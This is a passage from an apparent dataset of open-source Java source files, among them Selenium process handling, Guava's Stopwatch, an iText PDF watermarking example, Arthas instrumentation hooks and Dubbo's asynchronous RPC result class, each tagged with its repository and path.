// answers on the back of a postcard to SeleniumHQ, please.
if (!Platform.getCurrent().is(WINDOWS)) {
watchdog.destroyProcess();
watchdog.waitForTerminationAfterDestroy(2, SECONDS);
}
if (isRunning()) {
watchdog.destroyHarder();
watchdog.waitForTerminationAfterDestroy(1, SECONDS);
}
} else {
LOG.warning("Tried to destory a process which never started.");
}
// Make a best effort to drain the streams.
if (streamHandler != null) {
// Stop trying to read the output stream so that we don't race with the stream being closed
// when the process is destroyed.
streamHandler.setStopTimeout(2000);
try {
streamHandler.stop();
} catch (IOException e) {
// Ignore and destroy the process anyway.
LOG.log(
Level.INFO,
"Unable to drain process streams. Ignoring but the exception being swallowed follows.",
e);
}
}
if (!isRunning()) {
return getExitCode();
}
LOG.severe(String.format("Unable to kill process %s", watchdog.process));
int exitCode = -1;
executor.setExitValue(exitCode);
return exitCode;
}
public void waitFor() throws InterruptedException {
handler.waitFor();
}
public void waitFor(long timeout) throws InterruptedException {
long until = System.currentTimeMillis() + timeout;
boolean timedOut = true;
while (System.currentTimeMillis() < until) {
if (Thread.interrupted()) {
throw new InterruptedException();
}
if (handler.hasResult()) {
timedOut = false;
break;
}
Thread.sleep(50);
}
if (timedOut) {
throw new TimeoutException(
String.format("Process timed out after waiting for %d ms.", timeout));
}
// Wait until syserr and sysout have been read
}
public boolean isRunning() {
return !handler.hasResult();
}
public int getExitCode() {
if (isRunning()) {
throw new IllegalStateException("Cannot get exit code before executing command line: " + cl);
}
return handler.getExitValue();
}
public void checkForError() {
if (handler.getException() != null) {
LOG.severe(handler.getException().toString());
}
}
public String getStdOut() {
return inputOut.toString();
}
public void setInput(String allInput) {
this.allInput = allInput;
}
public void setWorkingDirectory(File workingDirectory) {
executor.setWorkingDirectory(workingDirectory);
}
@Override
public String toString() {
return cl.toString() + "[ " + env + "]";
}
public void copyOutputTo(OutputStream out) {
drainTo = out;
}
class SeleniumWatchDog extends ExecuteWatchdog {
private volatile Process process;
private volatile boolean starting = true;
SeleniumWatchDog(long timeout) {
super(timeout);
}
@Override
public synchronized void start(Process process) {
this.process = process;
starting = false;
super.start(process);
}
public void reset() {
starting = true;
}
private boolean waitForProcessStarted(long duration, TimeUnit unit) {
long end = System.currentTimeMillis() + unit.toMillis(duration);
while (starting && System.currentTimeMillis() < end) {
try {
Thread.sleep(50);
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
throw new WebDriverException(e);
}
}
return !starting;
}
private void waitForTerminationAfterDestroy(int duration, TimeUnit unit) {
long end = System.currentTimeMillis() + unit.toMillis(duration);
while (isRunning() && System.currentTimeMillis() < end) {
try {
Thread.sleep(50);
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
throw new WebDriverException(e);
}
}
}
private void destroyHarder() {
try {
Process awaitFor = this.process.destroyForcibly();
awaitFor.waitFor(10, SECONDS);
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
throw new RuntimeException(e);
}
}
}
}
| SeleniumHQ/selenium | java/src/org/openqa/selenium/os/OsProcess.java |
1,006 | package mindustry.world.meta;
/** Environmental flags for different types of locations. */
public class Env{
public static final int
//is on a planet
terrestrial = 1,
//is in space, no atmosphere
space = 1 << 1,
//is underwater, on a planet
underwater = 1 << 2,
//has a spores
spores = 1 << 3,
//has a scorching env effect
scorching = 1 << 4,
//has oil reservoirs
groundOil = 1 << 5,
//has water reservoirs
groundWater = 1 << 6,
//has oxygen in the atmosphere
oxygen = 1 << 7,
//all attributes combined, only used for bitmasking purposes
any = 0xffffffff,
//no attributes (0)
none = 0;
} | Anuken/Mindustry | core/src/mindustry/world/meta/Env.java |
1,007 | package com.baeldung.iTextPDF;
import static com.itextpdf.layout.properties.TextAlignment.CENTER;
import static com.itextpdf.layout.properties.VerticalAlignment.TOP;
import static java.lang.Math.PI;
import java.io.File;
import java.io.IOException;
import com.itextpdf.io.font.constants.StandardFonts;
import com.itextpdf.kernel.font.PdfFont;
import com.itextpdf.kernel.font.PdfFontFactory;
import com.itextpdf.kernel.geom.PageSize;
import com.itextpdf.kernel.pdf.PdfDocument;
import com.itextpdf.kernel.pdf.PdfPage;
import com.itextpdf.kernel.pdf.PdfReader;
import com.itextpdf.kernel.pdf.PdfWriter;
import com.itextpdf.kernel.pdf.canvas.PdfCanvas;
import com.itextpdf.kernel.pdf.extgstate.PdfExtGState;
import com.itextpdf.layout.Document;
import com.itextpdf.layout.element.Paragraph;
import com.itextpdf.layout.element.Text;
public class StoryTime {
public static final String OUTPUT_FILE = "output/aliceupdated.pdf";
public String alice = " Alice was a curious young girl who one day stumbled upon a strange, talking rabbit." + " The rabbit, in a hurry, invited Alice to follow him down a rabbit hole."
+ "Alice, not one to turn down an adventure, eagerly followed the rabbit and found herself tumbling down a long, dark tunnel.As she fell, Alice passed through a small door and into a fantastical world filled with talking animals and peculiar characters."
+ "She met the Cheshire Cat, who seemed to appear and disappear at will, and the Mad Hatter, who invited her to a tea party."
+ "Alice also encountered the tyrannical Queen of Hearts, who was quick to anger and ordered the beheading of anyone who crossed her."
+ "Despite the dangers, Alice remained determined to find her way home and eventually stumbled upon the key to the door that would take her back to the real world."
+ " As Alice stepped through the door and back into reality, she couldn't help but wonder if it had all been a dream. But the memories of her adventures in Wonderland stayed with her forever, and she often found herself longing to return to that strange and magical place.";
public String paul = " Paulinho is a Brazilian professional footballer who currently plays as a midfielder for Guangzhou Evergrande Taobao in the Chinese Super League."
+ "He has also played for several top clubs around the world, including Barcelona, Tottenham Hotspur, and Guangzhou Evergrande. Paulinho has represented Brazil at the international level and has won several accolades throughout his career, including the Copa America and the Chinese Super League title."
+ "He is known for his strong work ethic and powerful offensive play.";
public static void main(String[] args) throws IOException {
File file = new File(OUTPUT_FILE);
file.getParentFile()
.mkdirs();
// new StoryTime().createPdf();
new StoryTime().addWatermarkToExistingPdf();
}
public void createPdf() throws IOException {
StoryTime storyTime = new StoryTime();
String waterMark = "CONFIDENTIAL";
PdfWriter writer = new PdfWriter(storyTime.OUTPUT_FILE);
PdfDocument pdf = new PdfDocument(writer);
try (Document document = new Document(pdf)) {
document.add(new Paragraph(storyTime.alice).setFont(PdfFontFactory.createFont(StandardFonts.TIMES_ROMAN)));
document.add(new Paragraph(storyTime.paul));
Paragraph paragraph = storyTime.createWatermarkParagraph(waterMark);
for (int i = 1; i <= document.getPdfDocument()
.getNumberOfPages(); i++) {
storyTime.addWatermarkToPage(document, i, paragraph, 0f);
}
}
}
public void addWatermarkToExistingPdf() throws IOException {
StoryTime storyTime = new StoryTime();
String outputPdf = "output/aliceupdated.pdf";
String watermark = "CONFIDENTIAL";
try (PdfDocument pdfDocument = new PdfDocument(new PdfReader("output/alicepaulwithoutwatermark.pdf"), new PdfWriter(outputPdf))) {
Document document = new Document(pdfDocument);
Paragraph paragraph = storyTime.createWatermarkParagraph(watermark);
PdfExtGState transparentGraphicState = new PdfExtGState().setFillOpacity(0.5f);
for (int i = 1; i <= document.getPdfDocument()
.getNumberOfPages(); i++) {
storyTime.addWatermarkToExistingPage(document, i, paragraph, transparentGraphicState, 0f);
}
}
}
public Paragraph createWatermarkParagraph(String watermark) throws IOException {
PdfFont font = PdfFontFactory.createFont(StandardFonts.HELVETICA);
Text text = new Text(watermark);
text.setFont(font);
text.setFontSize(56);
text.setOpacity(0.5f);
return new Paragraph(text);
}
public void addWatermarkToPage(Document document, int pageIndex, Paragraph paragraph, float verticalOffset) {
PdfPage pdfPage = document.getPdfDocument()
.getPage(pageIndex);
PageSize pageSize = (PageSize) pdfPage.getPageSizeWithRotation();
float x = (pageSize.getLeft() + pageSize.getRight()) / 2;
float y = (pageSize.getTop() + pageSize.getBottom()) / 2;
float xOffset = 100f / 2;
float rotationInRadians = (float) (PI / 180 * 45f);
document.showTextAligned(paragraph, x - xOffset, y + verticalOffset, pageIndex, CENTER, TOP, rotationInRadians);
}
public void addWatermarkToExistingPage(Document document, int pageIndex, Paragraph paragraph, PdfExtGState graphicState, float verticalOffset) {
PdfDocument pdfDoc = document.getPdfDocument();
PdfPage pdfPage = pdfDoc.getPage(pageIndex);
PageSize pageSize = (PageSize) pdfPage.getPageSizeWithRotation();
float x = (pageSize.getLeft() + pageSize.getRight()) / 2;
float y = (pageSize.getTop() + pageSize.getBottom()) / 2;
PdfCanvas over = new PdfCanvas(pdfDoc.getPage(pageIndex));
over.saveState();
over.setExtGState(graphicState);
float xOffset = 100f / 2;
float rotationInRadians = (float) (PI / 180 * 45f);
document.showTextAligned(paragraph, x - xOffset, y + verticalOffset, pageIndex, CENTER, TOP, rotationInRadians);
document.flush();
over.restoreState();
over.release();
}
}
| eugenp/tutorials | libraries-files/src/main/java/com/baeldung/iTextPDF/StoryTime.java |
1,008 | /*
* Copyright (C) 2008 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.common.base;
import static com.google.common.base.Preconditions.checkNotNull;
import static com.google.common.base.Preconditions.checkState;
import static java.util.concurrent.TimeUnit.DAYS;
import static java.util.concurrent.TimeUnit.HOURS;
import static java.util.concurrent.TimeUnit.MICROSECONDS;
import static java.util.concurrent.TimeUnit.MILLISECONDS;
import static java.util.concurrent.TimeUnit.MINUTES;
import static java.util.concurrent.TimeUnit.NANOSECONDS;
import static java.util.concurrent.TimeUnit.SECONDS;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.GwtIncompatible;
import com.google.common.annotations.J2ktIncompatible;
import com.google.errorprone.annotations.CanIgnoreReturnValue;
import com.google.j2objc.annotations.J2ObjCIncompatible;
import java.time.Duration;
import java.util.concurrent.TimeUnit;
/**
* An object that accurately measures <i>elapsed time</i>: the measured duration between two
* successive readings of "now" in the same process.
*
* <p>In contrast, <i>wall time</i> is a reading of "now" as given by a method like
* {@link System#currentTimeMillis()}, best represented as an {@link java.time.Instant}. Such values
* <i>can</i> be subtracted to obtain a {@code Duration} (such as by {@code Duration.between}), but
* doing so does <i>not</i> give a reliable measurement of elapsed time, because wall time readings
* are inherently approximate, routinely affected by periodic clock corrections. Because this class
* (by default) uses {@link System#nanoTime}, it is unaffected by these changes.
*
* <p>Use this class instead of direct calls to {@link System#nanoTime} for two reasons:
*
* <ul>
* <li>The raw {@code long} values returned by {@code nanoTime} are meaningless and unsafe to use
* in any other way than how {@code Stopwatch} uses them.
* <li>An alternative source of nanosecond ticks can be substituted, for example for testing or
* performance reasons, without affecting most of your code.
* </ul>
*
* <p>The one downside of {@code Stopwatch} relative to {@link System#nanoTime()} is that {@code
* Stopwatch} requires object allocation and additional method calls, which can reduce the accuracy
* of the elapsed times reported. {@code Stopwatch} is still suitable for logging and metrics where
* reasonably accurate values are sufficient. If the uncommon case that you need to maximize
* accuracy, use {@code System.nanoTime()} directly instead.
*
* <p>Basic usage:
*
* <pre>{@code
* Stopwatch stopwatch = Stopwatch.createStarted();
* doSomething();
* stopwatch.stop(); // optional
*
* Duration duration = stopwatch.elapsed();
*
* log.info("time: " + stopwatch); // formatted string like "12.3 ms"
* }</pre>
*
* <p>The state-changing methods are not idempotent; it is an error to start or stop a stopwatch
* that is already in the desired state.
*
* <p>When testing code that uses this class, use {@link #createUnstarted(Ticker)} or {@link
* #createStarted(Ticker)} to supply a fake or mock ticker. This allows you to simulate any valid
* behavior of the stopwatch.
*
* <p><b>Note:</b> This class is not thread-safe.
*
* <p><b>Warning for Android users:</b> a stopwatch with default behavior may not continue to keep
* time while the device is asleep. Instead, create one like this:
*
* <pre>{@code
* Stopwatch.createStarted(
* new Ticker() {
* public long read() {
* return android.os.SystemClock.elapsedRealtimeNanos(); // requires API Level 17
* }
* });
* }</pre>
*
* @author Kevin Bourrillion
* @since 10.0
*/
@GwtCompatible(emulated = true)
@SuppressWarnings("GoodTime") // lots of violations
@ElementTypesAreNonnullByDefault
public final class Stopwatch {
private final Ticker ticker;
private boolean isRunning;
private long elapsedNanos;
private long startTick;
/**
* Creates (but does not start) a new stopwatch using {@link System#nanoTime} as its time source.
*
* @since 15.0
*/
public static Stopwatch createUnstarted() {
return new Stopwatch();
}
/**
* Creates (but does not start) a new stopwatch, using the specified time source.
*
* @since 15.0
*/
public static Stopwatch createUnstarted(Ticker ticker) {
return new Stopwatch(ticker);
}
/**
* Creates (and starts) a new stopwatch using {@link System#nanoTime} as its time source.
*
* @since 15.0
*/
public static Stopwatch createStarted() {
return new Stopwatch().start();
}
/**
* Creates (and starts) a new stopwatch, using the specified time source.
*
* @since 15.0
*/
public static Stopwatch createStarted(Ticker ticker) {
return new Stopwatch(ticker).start();
}
Stopwatch() {
this.ticker = Ticker.systemTicker();
}
Stopwatch(Ticker ticker) {
this.ticker = checkNotNull(ticker, "ticker");
}
/**
* Returns {@code true} if {@link #start()} has been called on this stopwatch, and {@link #stop()}
* has not been called since the last call to {@code start()}.
*/
public boolean isRunning() {
return isRunning;
}
/**
* Starts the stopwatch.
*
* @return this {@code Stopwatch} instance
* @throws IllegalStateException if the stopwatch is already running.
*/
@CanIgnoreReturnValue
public Stopwatch start() {
checkState(!isRunning, "This stopwatch is already running.");
isRunning = true;
startTick = ticker.read();
return this;
}
/**
* Stops the stopwatch. Future reads will return the fixed duration that had elapsed up to this
* point.
*
* @return this {@code Stopwatch} instance
* @throws IllegalStateException if the stopwatch is already stopped.
*/
@CanIgnoreReturnValue
public Stopwatch stop() {
long tick = ticker.read();
checkState(isRunning, "This stopwatch is already stopped.");
isRunning = false;
elapsedNanos += tick - startTick;
return this;
}
/**
* Sets the elapsed time for this stopwatch to zero, and places it in a stopped state.
*
* @return this {@code Stopwatch} instance
*/
@CanIgnoreReturnValue
public Stopwatch reset() {
elapsedNanos = 0;
isRunning = false;
return this;
}
private long elapsedNanos() {
return isRunning ? ticker.read() - startTick + elapsedNanos : elapsedNanos;
}
/**
* Returns the current elapsed time shown on this stopwatch, expressed in the desired time unit,
* with any fraction rounded down.
*
* <p><b>Note:</b> the overhead of measurement can be more than a microsecond, so it is generally
* not useful to specify {@link TimeUnit#NANOSECONDS} precision here.
*
* <p>It is generally not a good idea to use an ambiguous, unitless {@code long} to represent
* elapsed time. Therefore, we recommend using {@link #elapsed()} instead, which returns a
* strongly-typed {@code Duration} instance.
*
* @since 14.0 (since 10.0 as {@code elapsedTime()})
*/
public long elapsed(TimeUnit desiredUnit) {
return desiredUnit.convert(elapsedNanos(), NANOSECONDS);
}
/**
* Returns the current elapsed time shown on this stopwatch as a {@link Duration}. Unlike {@link
* #elapsed(TimeUnit)}, this method does not lose any precision due to rounding.
*
* @since 22.0
*/
@J2ktIncompatible
@GwtIncompatible
@J2ObjCIncompatible
public Duration elapsed() {
return Duration.ofNanos(elapsedNanos());
}
/** Returns a string representation of the current elapsed time. */
@Override
public String toString() {
long nanos = elapsedNanos();
TimeUnit unit = chooseUnit(nanos);
double value = (double) nanos / NANOSECONDS.convert(1, unit);
// Too bad this functionality is not exposed as a regular method call
return Platform.formatCompact4Digits(value) + " " + abbreviate(unit);
}
private static TimeUnit chooseUnit(long nanos) {
if (DAYS.convert(nanos, NANOSECONDS) > 0) {
return DAYS;
}
if (HOURS.convert(nanos, NANOSECONDS) > 0) {
return HOURS;
}
if (MINUTES.convert(nanos, NANOSECONDS) > 0) {
return MINUTES;
}
if (SECONDS.convert(nanos, NANOSECONDS) > 0) {
return SECONDS;
}
if (MILLISECONDS.convert(nanos, NANOSECONDS) > 0) {
return MILLISECONDS;
}
if (MICROSECONDS.convert(nanos, NANOSECONDS) > 0) {
return MICROSECONDS;
}
return NANOSECONDS;
}
private static String abbreviate(TimeUnit unit) {
switch (unit) {
case NANOSECONDS:
return "ns";
case MICROSECONDS:
return "\u03bcs"; // μs
case MILLISECONDS:
return "ms";
case SECONDS:
return "s";
case MINUTES:
return "min";
case HOURS:
return "h";
case DAYS:
return "d";
default:
throw new AssertionError();
}
}
}
| google/guava | guava/src/com/google/common/base/Stopwatch.java |
1,009 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.ingest;
import org.elasticsearch.common.settings.Setting;
import org.elasticsearch.core.TimeValue;
public final class IngestSettings {
private IngestSettings() {
// utility class
}
public static final Setting<TimeValue> GROK_WATCHDOG_INTERVAL = Setting.timeSetting(
"ingest.grok.watchdog.interval",
TimeValue.timeValueSeconds(1),
Setting.Property.NodeScope
);
public static final Setting<TimeValue> GROK_WATCHDOG_MAX_EXECUTION_TIME = Setting.timeSetting(
"ingest.grok.watchdog.max_execution_time",
TimeValue.timeValueSeconds(1),
Setting.Property.NodeScope
);
}
| elastic/elasticsearch | server/src/main/java/org/elasticsearch/ingest/IngestSettings.java |
1,010 | package java.arthas;
/**
* <pre>
* 一个adviceId 是什么呢? 就是一个trace/monitor/watch命令能对应上的一个id,比如一个类某个函数,它的 enter/end/exception 统一是一个id,分配完了就不会再分配。
*
* 同样一个method,如果它trace之后,也会有一个 adviceId, 这个method里的所有invoke都是统一处理,认为是一个 adviceId 。 但如果有匹配到不同的 invoke的怎么分配??
* 好像有点难了。。
*
* 其实就是把所有可以插入的地方都分类好,那么怎么分类呢?? 或者是叫同一种匹配,就是同一种的 adviceId?
*
* 比如入参是有 class , method ,是固定的 , 某个行号,或者 某个
*
* aop插入的叫 adviceId , command插入的叫 ListenerId?
*
*
*
* </pre>
*
* @author hengyunabc
*
*/
public class SpyAPI {
public static final AbstractSpy NOPSPY = new NopSpy();
private static volatile AbstractSpy spyInstance = NOPSPY;
public static volatile boolean INITED;
public static AbstractSpy getSpy() {
return spyInstance;
}
public static void setSpy(AbstractSpy spy) {
spyInstance = spy;
}
public static void setNopSpy() {
setSpy(NOPSPY);
}
public static boolean isNopSpy() {
return NOPSPY == spyInstance;
}
public static void init() {
INITED = true;
}
public static boolean isInited() {
return INITED;
}
public static void destroy() {
setNopSpy();
INITED = false;
}
public static void atEnter(Class<?> clazz, String methodInfo, Object target, Object[] args) {
spyInstance.atEnter(clazz, methodInfo, target, args);
}
public static void atExit(Class<?> clazz, String methodInfo, Object target, Object[] args,
Object returnObject) {
spyInstance.atExit(clazz, methodInfo, target, args, returnObject);
}
public static void atExceptionExit(Class<?> clazz, String methodInfo, Object target,
Object[] args, Throwable throwable) {
spyInstance.atExceptionExit(clazz, methodInfo, target, args, throwable);
}
public static void atBeforeInvoke(Class<?> clazz, String invokeInfo, Object target) {
spyInstance.atBeforeInvoke(clazz, invokeInfo, target);
}
public static void atAfterInvoke(Class<?> clazz, String invokeInfo, Object target) {
spyInstance.atAfterInvoke(clazz, invokeInfo, target);
}
public static void atInvokeException(Class<?> clazz, String invokeInfo, Object target, Throwable throwable) {
spyInstance.atInvokeException(clazz, invokeInfo, target, throwable);
}
public static abstract class AbstractSpy {
public abstract void atEnter(Class<?> clazz, String methodInfo, Object target,
Object[] args);
public abstract void atExit(Class<?> clazz, String methodInfo, Object target, Object[] args,
Object returnObject);
public abstract void atExceptionExit(Class<?> clazz, String methodInfo, Object target,
Object[] args, Throwable throwable);
public abstract void atBeforeInvoke(Class<?> clazz, String invokeInfo, Object target);
public abstract void atAfterInvoke(Class<?> clazz, String invokeInfo, Object target);
public abstract void atInvokeException(Class<?> clazz, String invokeInfo, Object target, Throwable throwable);
}
static class NopSpy extends AbstractSpy {
@Override
public void atEnter(Class<?> clazz, String methodInfo, Object target, Object[] args) {
}
@Override
public void atExit(Class<?> clazz, String methodInfo, Object target, Object[] args,
Object returnObject) {
}
@Override
public void atExceptionExit(Class<?> clazz, String methodInfo, Object target, Object[] args,
Throwable throwable) {
}
@Override
public void atBeforeInvoke(Class<?> clazz, String invokeInfo, Object target) {
}
@Override
public void atAfterInvoke(Class<?> clazz, String invokeInfo, Object target) {
}
@Override
public void atInvokeException(Class<?> clazz, String invokeInfo, Object target, Throwable throwable) {
}
}
}
| alibaba/arthas | spy/src/main/java/java/arthas/SpyAPI.java |
1,011 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.dubbo.rpc;
import org.apache.dubbo.common.logger.Logger;
import org.apache.dubbo.common.logger.LoggerFactory;
import org.apache.dubbo.common.threadpool.ThreadlessExecutor;
import org.apache.dubbo.rpc.model.ConsumerMethodModel;
import java.util.Map;
import java.util.concurrent.CompletableFuture;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.Executor;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;
import java.util.function.BiConsumer;
import java.util.function.Function;
import static org.apache.dubbo.common.utils.ReflectUtils.defaultReturn;
/**
* This class represents an unfinished RPC call, it will hold some context information for this call, for example RpcContext and Invocation,
* so that when the call finishes and the result returns, it can guarantee all the contexts being recovered as the same as when the call was made
* before any callback is invoked.
* <p>
* TODO if it's reasonable or even right to keep a reference to Invocation?
* <p>
* As {@link Result} implements CompletionStage, {@link AsyncRpcResult} allows you to easily build a async filter chain whose status will be
* driven entirely by the state of the underlying RPC call.
* <p>
* AsyncRpcResult does not contain any concrete value (except the underlying value bring by CompletableFuture), consider it as a status transfer node.
* {@link #getValue()} and {@link #getException()} are all inherited from {@link Result} interface, implementing them are mainly
* for compatibility consideration. Because many legacy {@link Filter} implementation are most possibly to call getValue directly.
*/
public class AsyncRpcResult implements Result {
private static final Logger logger = LoggerFactory.getLogger(AsyncRpcResult.class);
/**
* RpcContext may already have been changed when callback happens, it happens when the same thread is used to execute another RPC call.
* So we should keep the reference of current RpcContext instance and restore it before callback being executed.
*/
private RpcContext storedContext;
private RpcContext storedServerContext;
private Executor executor;
private Invocation invocation;
private CompletableFuture<AppResponse> responseFuture;
public AsyncRpcResult(CompletableFuture<AppResponse> future, Invocation invocation) {
this.responseFuture = future;
this.invocation = invocation;
this.storedContext = RpcContext.getContext();
this.storedServerContext = RpcContext.getServerContext();
}
/**
* Notice the return type of {@link #getValue} is the actual type of the RPC method, not {@link AppResponse}
*
* @return
*/
@Override
public Object getValue() {
return getAppResponse().getValue();
}
/**
* CompletableFuture can only be completed once, so try to update the result of one completed CompletableFuture will
* has no effect. To avoid this problem, we check the complete status of this future before update it's value.
*
* But notice that trying to give an uncompleted CompletableFuture a new specified value may face a race condition,
* because the background thread watching the real result will also change the status of this CompletableFuture.
* The result is you may lose the value you expected to set.
*
* @param value
*/
@Override
public void setValue(Object value) {
try {
if (responseFuture.isDone()) {
responseFuture.get().setValue(value);
} else {
AppResponse appResponse = new AppResponse(invocation);
appResponse.setValue(value);
responseFuture.complete(appResponse);
}
} catch (Exception e) {
// This should not happen in normal request process;
logger.error("Got exception when trying to fetch the underlying result from AsyncRpcResult.");
throw new RpcException(e);
}
}
@Override
public Throwable getException() {
return getAppResponse().getException();
}
@Override
public void setException(Throwable t) {
try {
if (responseFuture.isDone()) {
responseFuture.get().setException(t);
} else {
AppResponse appResponse = new AppResponse(invocation);
appResponse.setException(t);
responseFuture.complete(appResponse);
}
} catch (Exception e) {
// This should not happen in normal request process;
logger.error("Got exception when trying to fetch the underlying result from AsyncRpcResult.");
throw new RpcException(e);
}
}
@Override
public boolean hasException() {
return getAppResponse().hasException();
}
public CompletableFuture<AppResponse> getResponseFuture() {
return responseFuture;
}
public void setResponseFuture(CompletableFuture<AppResponse> responseFuture) {
this.responseFuture = responseFuture;
}
public Result getAppResponse() {
try {
if (responseFuture.isDone()) {
return responseFuture.get();
}
} catch (Exception e) {
// This should not happen in normal request process;
logger.error("Got exception when trying to fetch the underlying result from AsyncRpcResult.");
throw new RpcException(e);
}
return createDefaultValue(invocation);
}
/**
* This method will always return after a maximum 'timeout' waiting:
* 1. if value returns before timeout, return normally.
* 2. if no value returns after timeout, throw TimeoutException.
*
* @return
* @throws InterruptedException
* @throws ExecutionException
*/
@Override
public Result get() throws InterruptedException, ExecutionException {
if (executor != null && executor instanceof ThreadlessExecutor) {
ThreadlessExecutor threadlessExecutor = (ThreadlessExecutor) executor;
threadlessExecutor.waitAndDrain();
}
return responseFuture.get();
}
@Override
public Result get(long timeout, TimeUnit unit) throws InterruptedException, ExecutionException, TimeoutException {
if (executor != null && executor instanceof ThreadlessExecutor) {
ThreadlessExecutor threadlessExecutor = (ThreadlessExecutor) executor;
threadlessExecutor.waitAndDrain();
}
return responseFuture.get(timeout, unit);
}
@Override
public Object recreate() throws Throwable {
RpcInvocation rpcInvocation = (RpcInvocation) invocation;
if (InvokeMode.FUTURE == rpcInvocation.getInvokeMode()) {
return RpcContext.getContext().getFuture();
}
return getAppResponse().recreate();
}
public Result whenCompleteWithContext(BiConsumer<Result, Throwable> fn) {
this.responseFuture = this.responseFuture.whenComplete((v, t) -> {
beforeContext.accept(v, t);
fn.accept(v, t);
afterContext.accept(v, t);
});
return this;
}
@Override
public <U> CompletableFuture<U> thenApply(Function<Result, ? extends U> fn) {
return this.responseFuture.thenApply(fn);
}
@Override
@Deprecated
public Map<String, String> getAttachments() {
return getAppResponse().getAttachments();
}
@Override
public Map<String, Object> getObjectAttachments() {
return getAppResponse().getObjectAttachments();
}
@Override
public void setAttachments(Map<String, String> map) {
getAppResponse().setAttachments(map);
}
@Override
public void setObjectAttachments(Map<String, Object> map) {
getAppResponse().setObjectAttachments(map);
}
@Deprecated
@Override
public void addAttachments(Map<String, String> map) {
getAppResponse().addAttachments(map);
}
@Override
public void addObjectAttachments(Map<String, Object> map) {
getAppResponse().addObjectAttachments(map);
}
@Override
public String getAttachment(String key) {
return getAppResponse().getAttachment(key);
}
@Override
public Object getObjectAttachment(String key) {
return getAppResponse().getObjectAttachment(key);
}
@Override
public String getAttachment(String key, String defaultValue) {
return getAppResponse().getAttachment(key, defaultValue);
}
@Override
public Object getObjectAttachment(String key, Object defaultValue) {
return getAppResponse().getObjectAttachment(key, defaultValue);
}
@Override
public void setAttachment(String key, String value) {
setObjectAttachment(key, value);
}
@Override
public void setAttachment(String key, Object value) {
setObjectAttachment(key, value);
}
@Override
public void setObjectAttachment(String key, Object value) {
getAppResponse().setAttachment(key, value);
}
public Executor getExecutor() {
return executor;
}
public void setExecutor(Executor executor) {
this.executor = executor;
}
/**
* tmp context to use when the thread switch to Dubbo thread.
*/
private RpcContext tmpContext;
private RpcContext tmpServerContext;
private BiConsumer<Result, Throwable> beforeContext = (appResponse, t) -> {
tmpContext = RpcContext.getContext();
tmpServerContext = RpcContext.getServerContext();
RpcContext.restoreContext(storedContext);
RpcContext.restoreServerContext(storedServerContext);
};
private BiConsumer<Result, Throwable> afterContext = (appResponse, t) -> {
RpcContext.restoreContext(tmpContext);
RpcContext.restoreServerContext(tmpServerContext);
};
/**
* Some utility methods used to quickly generate default AsyncRpcResult instance.
*/
public static AsyncRpcResult newDefaultAsyncResult(AppResponse appResponse, Invocation invocation) {
return new AsyncRpcResult(CompletableFuture.completedFuture(appResponse), invocation);
}
public static AsyncRpcResult newDefaultAsyncResult(Invocation invocation) {
return newDefaultAsyncResult(null, null, invocation);
}
public static AsyncRpcResult newDefaultAsyncResult(Object value, Invocation invocation) {
return newDefaultAsyncResult(value, null, invocation);
}
public static AsyncRpcResult newDefaultAsyncResult(Throwable t, Invocation invocation) {
return newDefaultAsyncResult(null, t, invocation);
}
public static AsyncRpcResult newDefaultAsyncResult(Object value, Throwable t, Invocation invocation) {
CompletableFuture<AppResponse> future = new CompletableFuture<>();
AppResponse result = new AppResponse(invocation);
if (t != null) {
result.setException(t);
} else {
result.setValue(value);
}
future.complete(result);
return new AsyncRpcResult(future, invocation);
}
private static Result createDefaultValue(Invocation invocation) {
ConsumerMethodModel method = (ConsumerMethodModel) invocation.get(Constants.METHOD_MODEL);
return method != null ? new AppResponse(defaultReturn(method.getReturnClass())) : new AppResponse();
}
}
| apache/dubbo | dubbo-rpc/dubbo-rpc-api/src/main/java/org/apache/dubbo/rpc/AsyncRpcResult.java |
1,012 | /**************************************************************************/
/* GodotInputHandler.java */
/**************************************************************************/
/* This file is part of: */
/* GODOT ENGINE */
/* https://godotengine.org */
/**************************************************************************/
/* Copyright (c) 2014-present Godot Engine contributors (see AUTHORS.md). */
/* Copyright (c) 2007-2014 Juan Linietsky, Ariel Manzur. */
/* */
/* Permission is hereby granted, free of charge, to any person obtaining */
/* a copy of this software and associated documentation files (the */
/* "Software"), to deal in the Software without restriction, including */
/* without limitation the rights to use, copy, modify, merge, publish, */
/* distribute, sublicense, and/or sell copies of the Software, and to */
/* permit persons to whom the Software is furnished to do so, subject to */
/* the following conditions: */
/* */
/* The above copyright notice and this permission notice shall be */
/* included in all copies or substantial portions of the Software. */
/* */
/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, */
/* EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF */
/* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. */
/* IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY */
